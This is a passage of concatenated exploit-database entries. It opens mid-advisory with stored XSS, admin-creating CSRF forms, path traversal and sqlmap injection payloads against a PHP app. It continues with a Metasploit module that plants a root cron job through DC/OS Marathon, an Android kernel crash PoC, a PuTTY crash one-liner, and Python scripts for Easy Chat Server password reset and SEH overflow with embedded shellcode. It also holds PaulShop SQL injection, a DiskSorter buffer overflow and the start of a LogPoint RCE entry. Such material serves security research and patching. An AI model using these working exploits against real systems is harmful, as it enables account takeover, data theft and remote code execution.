action=modif&id=2&surnom="><script>alert(7)</script>&GUSO=&CS=&prenom="><script>alert(8)</script>&nom="><script>alert(9)</script>&email=&tel=&birthDay=0000-00-00&birthPlace=&habilitations=undefined&categorie=regisseur&SECU=&SIRET=N/A&intermittent=0&adresse=&cp=&ville=&assedic=
param vuln : surnom, prenom, nom
script vuln : beneficiaires_actions.php

6- XSS stored

POST /robert/fct/tekos_actions.php
action=addStruct&id=1&label=test%22%3E%3Cscript%3Ealert(1)%3C%2Fscript%3E&NomRS=&type="><script>alert(3)</script>&adresse=test"><script>alert(4)</script>&codePostal=12312&ville="><script>alert(5)</script>&email="><script>alert(6)</script>&tel=&SIRET="><script>alert(8)</script>&remarque=%22%3E%3Cscript%3Ealert(9)%3C%2Fscript%3E
param vuln : label, type, adresse, ville, email, SIRET et remarque
script vuln : beneficiaires_actions.php

7- CSRF Create new admin

<form action="http://192.168.3.215/robert/fct/user_actions.php"
method="POST">
<input type="hidden" name="action" value="create"/>
<input type="hidden" name="cMail" value="hacked@hacked.com"/>
<input type="hidden" name="cName" value="hacked"/>
<input type="hidden" name="cPren" value="hacked"/>
<input type="hidden" name="cPass" value="hacked"/>
<input type="hidden" name="cLevel" value="7"/>
<input type="hidden" name="cTekos" value="0"/>
<input type="submit" value="CSRFED This Shit"/>
</form>

8- CSRF Change admin password and infos

<form action="http://192.168.3.215/robert/fct/user_actions.php"
method="POST">
<input type="hidden" name="action" value="modifOwnUser"/>
<input type="hidden" name="id" value="1"/>
<input type="hidden" name="email" value="hacked"/>
<input type="hidden" name="nom" value="hacked"/>
<input type="hidden" name="prenom" value="hacked"/>
<input type="hidden" name="password" value="hacked"/>
<input type="submit" value="CSRFED This Shit"/>
</form>

9- Directory traversal on Download fonction ( Read Arbitrary File)

http://192.168.3.215/robert/fct/downloader.php?dir=sql&file=../../../../../../etc/passwd
param vuln : file
script vuln : downloader.php

10- Directory traversal on Upload fonction (Upload file in root path)

POST
/robert/fct/uploader.php?dataType=tekos&folder=../../config&qqfile=filename.jpg
HTTP/1.1
Host: 192.168.3.215
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101
Firefox/53.0
Accept: */*
Accept-Language: fr,fr-FR;q=0.8,en-US;q=0.5,en;q=0.3
X-Requested-With: XMLHttpRequest
X-File-Name: filename.jpg
Content-Type: application/octet-stream
Referer: http://192.168.3.215/robert/index.php?go=gens
Content-Length: 99550
Cookie: YOURCOOKIE
Connection: close

...snip...
file data
...snip...

param vuln : folder
script vuln : uploader.php


11- Directory traversal on Delete fonction (Delete Arbitrary File)

POST /robert/fct/plans_actions.php HTTP/1.1
Host: 192.168.3.215
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101
Firefox/53.0
Accept: */*
Accept-Language: fr,fr-FR;q=0.8,en-US;q=0.5,en;q=0.3
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: http://192.168.3.215/robert/index.php?go=calendrier
Content-Length: 42
Cookie:YOURCOOKIE
Connection: close

action=supprFichier&idPlan=4&file=../../../../tested.txt

param vuln : file
script vuln : plans_actions.php

11- SQL Injection


POST /robert/fct/plans_actions.php HTTP/1.1
Host: 192.168.3.215
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101
Firefox/53.0
Accept: */*
Accept-Language: fr,fr-FR;q=0.8,en-US;q=0.5,en;q=0.3
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: http://192.168.3.215/robert/index.php?go=calendrier
Content-Length: 20
Cookie: YOURCOOKIE
Connection: close

action=loadPlan&ID=2'

POST parameter 'ID' is vulnerable. Do you want to keep testing the others
(if any)? [y/N]
sqlmap identified the following injection point(s) with a total of 397
HTTP(s) requests:
---
Parameter: ID (POST)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)
(NOT)
    Payload: action=loadPlan&ID=2' OR NOT 8111=8111#

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP
BY clause (FLOOR)
    Payload: action=loadPlan&ID=2' AND (SELECT 3865 FROM(SELECT
COUNT(*),CONCAT(0x7171787171,(SELECT
(ELT(3865=3865,1))),0x717a7a7a71,FLOOR(RAND(0)*2))x FROM
INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- XhTe

    Type: stacked queries
    Title: MySQL > 5.0.11 stacked queries (comment)
    Payload: action=loadPlan&ID=2';SELECT SLEEP(5)#

    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 OR time-based blind
    Payload: action=loadPlan&ID=2' OR SLEEP(5)-- zwwN
---

param vuln : ID
script vuln : plans_actions.php

------------------------------------------------------------------------------------------------------------------------------

#### Special Thanks to SC, PC and Mana l'artiste from HTTPCS - Ziwit
SecTeam ####

------------------------------------------------------------------------------------------------------------------------------
HireHackking 
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::FileDropper

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'DC/OS Marathon UI Docker Exploit',
      'Description'    => %q{
        Utilizing the DCOS Cluster's Marathon UI, an attacker can create
        a docker container with the '/' path mounted with read/write
        permissions on the host server that is running the docker container.
        As the docker container executes command as uid 0 it is honored
        by the host operating system allowing the attacker to edit/create
        files owed by root. This exploit abuses this to creates a cron job
        in the '/etc/cron.d/' path of the host server.

        *Notes: The docker image must be a valid docker image from
        hub.docker.com. Further more the docker container will only
        deploy if there are resources available in the DC/OS cluster.
      },
      'Author'         => 'Erik Daguerre',
      'License'        => MSF_LICENSE,
      'References'     => [
        [ 'URL', 'https://warroom.securestate.com/dcos-marathon-compromise/'],
      ],
      'Targets'            => [
        [ 'Python', {
            'Platform'   => 'python',
            'Arch'       => ARCH_PYTHON,
            'Payload'    => {
              'Compat'   => {
                'ConnectionType' => 'reverse noconn none tunnel'
              }
            }
          }
        ]
      ],
      'DefaultOptions' => { 'WfsDelay' => 75 },
      'DefaultTarget'  => 0,
      'DisclosureDate' => 'Mar 03, 2017'))

    register_options(
      [
        Opt::RPORT(8080),
        OptString.new('TARGETURI', [ true, 'Post path to start docker', '/v2/apps' ]),
        OptString.new('DOCKERIMAGE', [ true, 'hub.docker.com image to use', 'python:3-slim' ]),
        OptString.new('CONTAINER_ID', [ false, 'container id you would like']),
        OptInt.new('WAIT_TIMEOUT', [ true, 'Time in seconds to wait for the docker container to deploy', 60 ])
      ])
  end

  def get_apps
    res = send_request_raw({
      'method'  => 'GET',
      'uri'     => target_uri.path
    })
    return unless res and res.code == 200

    # verify it is marathon ui, and is returning content-type json
    return unless res.headers.to_json.include? 'Marathon' and res.headers['Content-Type'].include? 'application/json'
    apps = JSON.parse(res.body)

    apps
  end

  def del_container(container_id)
    res = send_request_raw({
      'method'  => 'DELETE',
      'uri'     => normalize_uri(target_uri.path, container_id)
    })
    return unless res and res.code == 200

    res.code
  end

  def make_container_id
    return datastore['CONTAINER_ID'] unless datastore['CONTAINER_ID'].nil?

    rand_text_alpha_lower(8)
  end

  def make_cmd(mnt_path, cron_path, payload_path)
    vprint_status('Creating the docker container command')
    payload_data = nil
    echo_cron_path = mnt_path + cron_path
    echo_payload_path = mnt_path + payload_path

    cron_command = "python #{payload_path}"
    payload_data = payload.raw

    command = "echo \"#{payload_data}\" >> #{echo_payload_path}\n"
    command << "echo \"PATH=/sbin:/bin:/usr/sbin:/usr/bin:/usr/local/sbin:/usr/local/bin\" >> #{echo_cron_path}\n"
    command << "echo \"\" >> #{echo_cron_path}\n"
    command << "echo \"* * * * * root #{cron_command}\" >> #{echo_cron_path}\n"
    command << "sleep 120"

    command
  end

  def make_container(mnt_path, cron_path, payload_path, container_id)
    vprint_status('Setting container json request variables')
    container_data = {
      'cmd'                 => make_cmd(mnt_path, cron_path, payload_path),
      'cpus'                => 1,
      'mem'                 => 128,
      'disk'                => 0,
      'instances'           => 1,
      'id'                  => container_id,
      'container'           => {
        'docker'            => {
          'image'           => datastore['DOCKERIMAGE'],
          'network'         => 'HOST',
        },
        'type'              => 'DOCKER',
        'volumes'           => [
          {
            'hostPath'      => '/',
            'containerPath' => mnt_path,
            'mode'          => 'RW'
          }
        ],
      },
      'env'                 => {},
      'labels'              => {}
    }

    container_data
  end

  def check
    return Exploit::CheckCode::Safe if get_apps.nil?

    Exploit::CheckCode::Appears
  end

  def exploit
    if get_apps.nil?
      fail_with(Failure::Unknown, 'Failed to connect to the targeturi')
    end
    # create required information to create json container information.
    cron_path = '/etc/cron.d/' + rand_text_alpha(8)
    payload_path = '/tmp/' + rand_text_alpha(8)
    mnt_path = '/mnt/' + rand_text_alpha(8)
    container_id = make_container_id()

    res = send_request_raw({
      'method'  => 'POST',
      'uri'     => target_uri.path,
      'data'    => make_container(mnt_path, cron_path, payload_path, container_id).to_json
    })
    fail_with(Failure::Unknown, 'Failed to create the docker container') unless res and res.code == 201

    print_status('The docker container is created, waiting for it to deploy')
    register_files_for_cleanup(cron_path, payload_path)
    sleep_time = 5
    wait_time = datastore['WAIT_TIMEOUT']
    deleted_container = false
    print_status("Waiting up to #{wait_time} seconds for docker container to start")

    while wait_time > 0
      sleep(sleep_time)
      wait_time -= sleep_time
      apps_status = get_apps
      fail_with(Failure::Unknown, 'No apps returned') unless apps_status

      apps_status['apps'].each do |app|
        next if app['id'] != "/#{container_id}"

        if app['tasksRunning'] == 1
          print_status('The docker container is running, removing it')
          del_container(container_id)
          deleted_container = true
          wait_time = 0
        else
          vprint_status('The docker container is not yet running')
        end
        break
      end
    end

    # If the docker container does not deploy remove it and fail out.
    unless deleted_container
      del_container(container_id)
      fail_with(Failure::Unknown, "The docker container failed to start")
    end
    print_status('Waiting for the cron job to run, can take up to 60 seconds')
  end
end
HireHackking 
// Source: https://raw.githubusercontent.com/danieljiang0415/android_kernel_crash_poc/master/panic.c

#include <stdio.h>
#include <sys/socket.h>
#include <arpa/inet.h>
#include <stdlib.h>
static int sockfd = 0;
static struct sockaddr_in addr = {0};

void fuzz(void * param){
    while(1){
        addr.sin_family = 0;//rand()%42;
        printf("sin_family1 = %08lx\n", addr.sin_family);
        connect(sockfd, (struct sockaddr *)&addr, 16); 
    }
}
int main(int argc, char **argv)
{
    sockfd = socket(AF_INET, SOCK_DGRAM, IPPROTO_ICMP);
    int thrd;
    pthread_create(&thrd, NULL, fuzz, NULL);
    while(1){
        addr.sin_family = 0x1a;//rand()%42;
        addr.sin_port = 0;
        addr.sin_addr.s_addr = htonl(INADDR_LOOPBACK);
        connect(sockfd, (struct sockaddr *)&addr, 16);
        addr.sin_family = 0;
    }
    return 0;
}
HireHackking 
Source: https://www.chiark.greenend.org.uk/~sgtatham/putty/wishlist/vuln-agent-fwd-overflow.html

summary: Vulnerability: integer overflow permits memory overwrite by forwarded ssh-agent connections
class: vulnerability: This is a security vulnerability.
difficulty: fun: Just needs tuits, and not many of them.
priority: high: This should be fixed in the next release.
present-in: 0.67
fixed-in: 4ff22863d895cb7ebfced4cf923a012a614adaa8 (0.68)

Many versions of PuTTY prior to 0.68 have a heap-corrupting integer overflow bug in the ssh_agent_channel_data function which processes messages sent by remote SSH clients to a forwarded agent connection.

The agent protocol begins every message with a 32-bit length field, which gives the length of the remainder of the message, not including the length field itself. In order to accumulate the entire message including the length field in an internal buffer, PuTTY added 4 to the received length value, to obtain the message length inclusive of everything. This addition was unfortunately missing a check for unsigned integer overflow.

Hence, sending a length field large enough to overflow when 4 is added to it, such as 0xFFFFFFFD, would cause PuTTY to record a value for the total message length (totallen) which was smaller than the amount of data it had already seen (lensofar, which at this point would be 4 bytes for the length field itself). Then, it would assume that the expression totallen-lensofar represented the amount of space it was safe to write into its buffer – but in fact, in the overflowing case, this value would wrap back round to a number just less than 232, far larger than the allocated heap block, and PuTTY could be induced to overwrite its heap with data sent by the attacker.

If your server is running Linux or any reasonably similar Unix, and has the socat network utility installed, then you can use this simple proof of concept to determine whether you are affected. Simply run the shell command

(echo -ne '\xFF\xFF\xFF\xFD\x0B'; cat /dev/zero) | socat stdio unix-connect:$SSH_AUTH_SOCK

and PuTTY will crash.

This bug is only exploitable at all if you have enabled SSH agent forwarding, which is turned off by default. Moreover, an attacker able to exploit this bug would have to have already be able to connect to the Unix-domain socket representing the forwarded agent connection. Since any attacker with that capability would necessarily already be able to generate signatures with your agent's stored private keys, you should in normal circumstances be defended against this vulnerability by the same precautions you and your operating system were already taking to prevent untrusted people from accessing your SSH agent.

This vulnerability was reported by Tim Kosse, and has been assigned CVE ID CVE-2017-6542.
HireHackking 
Source: https://bugzilla.gnome.org/show_bug.cgi?id=775120

The attached file will cause a null pointer access and segfault in the mpegts parser. Current git code, found with afl.

ASAN stack trace:
=================================================================
==32545==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000000 (pc 0x7fe957185495 bp 0x60200002cf7a sp 0x7fe956e027a0 T2)
==32545==The signal is caused by a WRITE memory access.
==32545==Hint: address points to the zero page.
    #0 0x7fe957185494 in _parse_pat /f/gstreamer/gst-plugins-bad/gst-libs/gst/mpegts/gstmpegtssection.c:441:32
    #1 0x7fe957184058 in __common_section_checks /f/gstreamer/gst-plugins-bad/gst-libs/gst/mpegts/gstmpegtssection.c:166:9
    #2 0x7fe95718522f in gst_mpegts_section_get_pat /f/gstreamer/gst-plugins-bad/gst-libs/gst/mpegts/gstmpegtssection.c:480:9
    #3 0x7fe957438b9a in mpegts_base_apply_pat /f/gstreamer/gst-plugins-bad/gst/mpegtsdemux/mpegtsbase.c:942:20
    #4 0x7fe957438b9a in mpegts_base_handle_psi /f/gstreamer/gst-plugins-bad/gst/mpegtsdemux/mpegtsbase.c:1155
    #5 0x7fe957437cd1 in mpegts_base_chain /f/gstreamer/gst-plugins-bad/gst/mpegtsdemux/mpegtsbase.c:1424:11
    #6 0x7fe9574341e7 in mpegts_base_loop /f/gstreamer/gst-plugins-bad/gst/mpegtsdemux/mpegtsbase.c:1589:13
    #7 0x7fe9644305c3 in gst_task_func /f/gstreamer/gstreamer/gst/gsttask.c:334:5
    #8 0x7fe96362f867  (/usr/lib64/libglib-2.0.so.0+0x70867)
    #9 0x7fe96362eed4  (/usr/lib64/libglib-2.0.so.0+0x6fed4)
    #10 0x7fe9630ac443 in start_thread (/lib64/libpthread.so.0+0x7443)
    #11 0x7fe962bdb92c in clone (/lib64/libc.so.6+0xe792c)

AddressSanitizer can not provide additional info.
SUMMARY: AddressSanitizer: SEGV /f/gstreamer/gst-plugins-bad/gst-libs/gst/mpegts/gstmpegtssection.c:441:32 in _parse_pat
Thread T2 (tsdemux0:sink) created by T1 (typefind:sink) here:
    #0 0x42e26d in __interceptor_pthread_create (/usr/bin/gst-discoverer-1.0+0x42e26d)
    #1 0x7fe96364cadf  (/usr/lib64/libglib-2.0.so.0+0x8dadf)

Thread T1 (typefind:sink) created by T0 here:
    #0 0x42e26d in __interceptor_pthread_create (/usr/bin/gst-discoverer-1.0+0x42e26d)
    #1 0x7fe96364cadf  (/usr/lib64/libglib-2.0.so.0+0x8dadf)

==32545==ABORTING


Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/42162.zip
HireHackking 
# Exploit Title: Easy Chat Server Remote Password Reset
# Date: 09/10/2017
# Software Link: http://echatserver.com/ecssetup.exe
# Exploit Author: Aitezaz Mohsin
# Vulnerable Version: v2.0 to v3.1
# Vulnerability Type: Pre-Auth Remote Password Reset
# Severity: Critical

# ====================================================================================================
#	Registeration page 'register.ghp' allows resetting ANY user's password.
# Remote un-authenticated attackers can send HTTP POST requests to Hijack ANY Easy Chat Server account.
# ====================================================================================================

# USAGE: python exploit.py ip port username password

#!/usr/bin/python

import os,sys,socket

ip = sys.argv[1]
username = sys.argv[2]
password = sys.argv[3] 

socket = socket.socket(socket.AF_INET , socket.SOCK_STREAM)

socket.connect((ip , 80))


buffer = "POST /registresult.htm HTTP/1.1"
buffer += "Host: 192.168.1.11"
buffer += "User-Agent: Mozilla/5.0 (X11; Linux i686; rv:45.0) Gecko/20100101 Firefox/45.0"
buffer += "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8"
buffer += "Accept-Language: en-US,en;q=0.5"
buffer += "Accept-Encoding: gzip, deflate"
buffer += "Connection: close"
buffer += "Content-Type: application/x-www-form-urlencoded"
 
buffer += "UserName=" + username + "&Password=" + password  + "&Password1=ggg&Sex=0&Email=%25252540&Icon=image17.gif&Resume=aaa&cw=0&RoomID=%3C%21--%24RoomID--%3E&RepUserName=%3C%21--%24UserName--%3E&submit1=Change"
 
socket.send(buffer)

socket.close()

print "[#] Password Changed Successfully"
HireHackking 
# Exploit Title: Easy Chat Server User Registeration Buffer Overflow (SEH)
# Date: 09/10/2017
# Software Link: http://echatserver.com/ecssetup.exe
# Exploit Author: Aitezaz Mohsin
# Vulnerable Version: v2.0 to v3.1
# Vulnerability Type: Buffer Overflow
# Severity: Critical
# Tested on: [Windows XP Sp3 Eng]


# ======================================================================================================================
#	Username parameter in Registeration page 'register.ghp' is prone to a stack-based buffer-overflow vulnerability.
# Application fails to properly bounds-check user-supplied data before copying it into an insufficiently sized buffer. 
# ======================================================================================================================

# USAGE: python exploit.py ip

#!/usr/bin/python

import os
import sys
import socket

ip = sys.argv[1]

socket = socket.socket(socket.AF_INET , socket.SOCK_STREAM)

socket.connect((ip , 80))

#AlphanumericShellcode

shellcode = ("\x89\xe2\xda\xde\xd9\x72\xf4\x59\x49\x49\x49\x49\x49\x43\x43"
"\x43\x43\x43\x43\x51\x5a\x56\x54\x58\x33\x30\x56\x58\x34\x41"
"\x50\x30\x41\x33\x48\x48\x30\x41\x30\x30\x41\x42\x41\x41\x42"
"\x54\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x58\x50"
"\x38\x41\x43\x4a\x4a\x49\x4b\x4c\x5a\x48\x4b\x32\x55\x50\x33"
"\x30\x35\x50\x43\x50\x4d\x59\x5a\x45\x36\x51\x4f\x30\x32\x44"
"\x4c\x4b\x30\x50\x50\x30\x4c\x4b\x51\x42\x54\x4c\x4c\x4b\x30"
"\x52\x44\x54\x4c\x4b\x44\x32\x36\x48\x34\x4f\x58\x37\x50\x4a"
"\x31\x36\x36\x51\x4b\x4f\x4e\x4c\x47\x4c\x43\x51\x33\x4c\x43"
"\x32\x46\x4c\x51\x30\x39\x51\x48\x4f\x34\x4d\x45\x51\x48\x47"
"\x4d\x32\x4c\x32\x50\x52\x56\x37\x4c\x4b\x31\x42\x42\x30\x4c"
"\x4b\x31\x5a\x47\x4c\x4c\x4b\x30\x4c\x54\x51\x42\x58\x4a\x43"
"\x47\x38\x35\x51\x48\x51\x36\x31\x4c\x4b\x46\x39\x37\x50\x55"
"\x51\x49\x43\x4c\x4b\x50\x49\x35\x48\x4b\x53\x57\x4a\x37\x39"
"\x4c\x4b\x50\x34\x4c\x4b\x53\x31\x38\x56\x56\x51\x4b\x4f\x4e"
"\x4c\x49\x51\x38\x4f\x44\x4d\x53\x31\x39\x57\x37\x48\x4b\x50"
"\x32\x55\x4a\x56\x43\x33\x43\x4d\x4c\x38\x57\x4b\x43\x4d\x31"
"\x34\x43\x45\x5a\x44\x46\x38\x4c\x4b\x31\x48\x51\x34\x33\x31"
"\x58\x53\x42\x46\x4c\x4b\x44\x4c\x30\x4b\x4c\x4b\x46\x38\x35"
"\x4c\x35\x51\x4e\x33\x4c\x4b\x45\x54\x4c\x4b\x43\x31\x4e\x30"
"\x4d\x59\x30\x44\x31\x34\x37\x54\x31\x4b\x51\x4b\x53\x51\x31"
"\x49\x50\x5a\x56\x31\x4b\x4f\x4d\x30\x51\x4f\x51\x4f\x50\x5a"
"\x4c\x4b\x35\x42\x5a\x4b\x4c\x4d\x51\x4d\x55\x38\x46\x53\x36"
"\x52\x35\x50\x55\x50\x45\x38\x32\x57\x32\x53\x30\x32\x51\x4f"
"\x56\x34\x33\x58\x30\x4c\x32\x57\x56\x46\x44\x47\x4b\x4f\x58"
"\x55\x4f\x48\x4c\x50\x35\x51\x43\x30\x43\x30\x37\x59\x4f\x34"
"\x50\x54\x50\x50\x32\x48\x37\x59\x4b\x30\x32\x4b\x55\x50\x4b"
"\x4f\x59\x45\x53\x5a\x33\x38\x50\x59\x50\x50\x5a\x42\x4b\x4d"
"\x51\x50\x36\x30\x31\x50\x36\x30\x45\x38\x4b\x5a\x54\x4f\x39"
"\x4f\x4b\x50\x4b\x4f\x38\x55\x4c\x57\x52\x48\x53\x32\x45\x50"
"\x44\x51\x31\x4c\x4b\x39\x4b\x56\x52\x4a\x52\x30\x50\x56\x56"
"\x37\x33\x58\x58\x42\x39\x4b\x46\x57\x55\x37\x4b\x4f\x39\x45"
"\x51\x47\x43\x58\x4f\x47\x4b\x59\x30\x38\x4b\x4f\x4b\x4f\x59"
"\x45\x51\x47\x42\x48\x54\x34\x5a\x4c\x57\x4b\x4b\x51\x4b\x4f"
"\x48\x55\x30\x57\x5a\x37\x42\x48\x32\x55\x52\x4e\x30\x4d\x45"
"\x31\x4b\x4f\x38\x55\x35\x38\x35\x33\x52\x4d\x45\x34\x45\x50"
"\x4b\x39\x4d\x33\x56\x37\x31\x47\x56\x37\x46\x51\x5a\x56\x32"
"\x4a\x44\x52\x56\x39\x31\x46\x5a\x42\x4b\x4d\x53\x56\x39\x57"
"\x30\x44\x51\x34\x57\x4c\x35\x51\x33\x31\x4c\x4d\x37\x34\x57"
"\x54\x32\x30\x58\x46\x35\x50\x51\x54\x50\x54\x30\x50\x31\x46"
"\x51\x46\x36\x36\x31\x56\x36\x36\x30\x4e\x36\x36\x51\x46\x31"
"\x43\x46\x36\x43\x58\x33\x49\x48\x4c\x47\x4f\x4b\x36\x4b\x4f"
"\x58\x55\x4c\x49\x4d\x30\x30\x4e\x36\x36\x47\x36\x4b\x4f\x56"
"\x50\x32\x48\x33\x38\x4c\x47\x35\x4d\x35\x30\x4b\x4f\x49\x45"
"\x4f\x4b\x4a\x50\x48\x35\x59\x32\x50\x56\x52\x48\x4f\x56\x5a"
"\x35\x4f\x4d\x4d\x4d\x4b\x4f\x58\x55\x37\x4c\x53\x36\x33\x4c"
"\x44\x4a\x4b\x30\x4b\x4b\x4d\x30\x33\x45\x45\x55\x4f\x4b\x37"
"\x37\x34\x53\x52\x52\x32\x4f\x53\x5a\x35\x50\x36\x33\x4b\x4f"
"\x4e\x35\x41\x41")     

magic = "B" * 217
magic += "\xeb\x06\x90\x90"
magic += "\xBC\x04\x01\x10"
magic += shellcode

magic += "C" * 200
 

buffer = "POST /registresult.htm HTTP/1.1\r\n\r\n"
buffer += "Host: 192.168.1.11"
buffer += "User-Agent: Mozilla/5.0 (X11; Linux i686; rv:45.0) Gecko/20100101 Firefox/45.0"
buffer += "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8"
buffer += "Accept-Language: en-US,en;q=0.5"
buffer += "Accept-Encoding: gzip, deflate"
buffer += "Referer: http://192.168.1.11/register.ghp"
buffer += "Connection: close"
buffer += "Content-Type: application/x-www-form-urlencoded"

buffer += "UserName=" + magic +"&Password=test&Password1=test&Sex=1&Email=x@&Icon=x.gif&Resume=xxxx&cw=1&RoomID=4&RepUserName=admin&submit1=Register"

socket.send(buffer)

data = socket.recv(4096)
print data
socket.close()
HireHackking

PaulShop - SQL Injection 

# Exploit Title: [PaulShop CMS <= 2017-03-25 Sql Injection]
# Date: [10-06-2017]
# Exploit Author: [Se0pHpHack3r]
# Vendor Homepage: [https://codecanyon.net/item/paulshop-cms-with-shopping-cart-system/18070714]
# Version: [2017-03-25] 

1. Description

SQL Injection on Shipping Cost page in Cart, with "country" & "weight" parameter (GET)

2. Examples

http://localhost/shop/en/cart/shipping_cost?country=[SQL INJECTION HERE]
http://localhost/shop/en/cart/shipping_cost?country=TH&weight=[SQL INJECTION HERE]
HireHackking 
#!/usr/bin/python

###############################################################################
# Exploit Title: DiskSorter v9.7.14 - Local Buffer Overflow
# Date: 10-06-2017
# Exploit Author: abatchy17 -- @abatchy17
# Vulnerable Software: DiskSorter v9.7.14
# Vendor Homepage:    http://www.disksorter.com/    
# Version: 9.7.14
# Software Link:      http://www.disksorter.com/setups/disksorter_setup_v9.7.14.exe
# Tested On: Windows XP SP3
#
# To trigger the exploit, paste the content of exploit.txt into "Add Input Directory" text box
#
# Credit to n3ckD_ for discovering the DoS exploit
#
# Challenges to convert this DoS to code execution:
#   1. Program doesn't accept non ASCII characters (0x01 to 0xff are okay-ish)
#   2. Buffer at ESP splits string if it contains a "\", this is bad since POP ESP is 0x5c
#   3. Had to write custom shellcode to get the exact location of alphanumeric shellcode in memory
#
#               +----------------------------------+
#               |1 custom shellcode == 1 dead llama|
#               +----------------------------------+
#
##############################################################################

a = open("exploit.txt", "w")

# Message=  0x651f214e : jmp esp | asciiprint,ascii {PAGE_EXECUTE_READ} [QtGui4.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False

badchars = "\x0a\x0d\x2f"

# msfvenom -a x86 --platform windows -p windows/exec CMD=calc.exe -e x86/alpha_mixed BufferRegister=EAX -f python -b "\x0a\x0d\x2f"
buf =  ""
buf += "\x50\x59\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49"
buf += "\x49\x49\x49\x49\x49\x37\x51\x5a\x6a\x41\x58\x50\x30"
buf += "\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32\x42\x42"
buf += "\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49"
buf += "\x6b\x4c\x5a\x48\x4f\x72\x57\x70\x75\x50\x43\x30\x43"
buf += "\x50\x4b\x39\x4d\x35\x44\x71\x79\x50\x63\x54\x6e\x6b"
buf += "\x62\x70\x76\x50\x6e\x6b\x42\x72\x46\x6c\x6e\x6b\x63"
buf += "\x62\x62\x34\x6c\x4b\x43\x42\x76\x48\x36\x6f\x68\x37"
buf += "\x73\x7a\x46\x46\x74\x71\x49\x6f\x4e\x4c\x57\x4c\x55"
buf += "\x31\x51\x6c\x35\x52\x46\x4c\x51\x30\x6a\x61\x6a\x6f"
buf += "\x64\x4d\x67\x71\x6b\x77\x79\x72\x68\x72\x70\x52\x70"
buf += "\x57\x6c\x4b\x53\x62\x36\x70\x6c\x4b\x52\x6a\x67\x4c"
buf += "\x4c\x4b\x50\x4c\x62\x31\x42\x58\x79\x73\x32\x68\x37"
buf += "\x71\x4a\x71\x73\x61\x4e\x6b\x63\x69\x31\x30\x35\x51"
buf += "\x69\x43\x4c\x4b\x50\x49\x64\x58\x58\x63\x46\x5a\x32"
buf += "\x69\x6e\x6b\x36\x54\x4e\x6b\x57\x71\x38\x56\x65\x61"
buf += "\x49\x6f\x6e\x4c\x69\x51\x7a\x6f\x66\x6d\x46\x61\x69"
buf += "\x57\x70\x38\x39\x70\x33\x45\x39\x66\x35\x53\x31\x6d"
buf += "\x68\x78\x75\x6b\x73\x4d\x71\x34\x70\x75\x38\x64\x33"
buf += "\x68\x4e\x6b\x32\x78\x51\x34\x65\x51\x39\x43\x31\x76"
buf += "\x4c\x4b\x64\x4c\x32\x6b\x6e\x6b\x62\x78\x65\x4c\x47"
buf += "\x71\x59\x43\x4c\x4b\x44\x44\x4c\x4b\x56\x61\x38\x50"
buf += "\x6f\x79\x52\x64\x54\x64\x34\x64\x63\x6b\x73\x6b\x50"
buf += "\x61\x50\x59\x71\x4a\x56\x31\x59\x6f\x59\x70\x33\x6f"
buf += "\x53\x6f\x71\x4a\x4c\x4b\x44\x52\x68\x6b\x6e\x6d\x53"
buf += "\x6d\x62\x4a\x56\x61\x4c\x4d\x6b\x35\x6d\x62\x75\x50"
buf += "\x45\x50\x75\x50\x32\x70\x32\x48\x76\x51\x4e\x6b\x30"
buf += "\x6f\x6f\x77\x39\x6f\x4e\x35\x4d\x6b\x58\x70\x4d\x65"
buf += "\x4e\x42\x53\x66\x62\x48\x6d\x76\x4a\x35\x6d\x6d\x4d"
buf += "\x4d\x69\x6f\x79\x45\x57\x4c\x46\x66\x53\x4c\x56\x6a"
buf += "\x6f\x70\x49\x6b\x6d\x30\x33\x45\x33\x35\x4d\x6b\x50"
buf += "\x47\x37\x63\x74\x32\x52\x4f\x53\x5a\x43\x30\x53\x63"
buf += "\x49\x6f\x38\x55\x52\x43\x63\x51\x50\x6c\x65\x33\x54"
buf += "\x6e\x62\x45\x54\x38\x62\x45\x55\x50\x41\x41"

jmpebp = "\x1f\x54\x1c\x65" # Why JMP EBP? Buffer at ESP is split, bad!

llamaleftovers = (
    "\x55"  # push EBP
    "\x58"  # pop EAX
    "\x05\x55\x55\x55\x55"  # add EAX, 0x55555555
    "\x05\x55\x55\x55\x55"  # add EAX, 0x55555555
    "\x05\x56\x56\x55\x55"  # add EAX, 0x55555656 -> EAX = EBP + 209
    "\x40"  # inc EAX, shellcode generated should start exactly here (EBP + 210) as we're using the x86/alpha_mixed with BufferRegister to get a purely alphanumeric shellcode
    )

junk = "\x55" + + "\x53\x5b" * 105

data = "A"*4096 + jmpebp + "\x40\x48" * 20 + llamaleftovers + junk + buf

a.write(data)
a.close()
HireHackking 
# Exploit Title: Unauthenticated remote root code execution on logpoint < 5.6.4
# Date: 11/06/17
# Exploit Author: agix
# Vendor Homepage: https://www.logpoint.com
# Version: logpoint < 5.6.4
# Tested on: 5.6.2

# Vendor contact 19/04
# Exploit details sent to the vendor 24/04
# Patch in test mode 05/05
# Patch release to public 08/05


# run python -m SimpleHTTPServer to serve second stage of the exploit in a file named e
# to get root code execution this is the second stage e
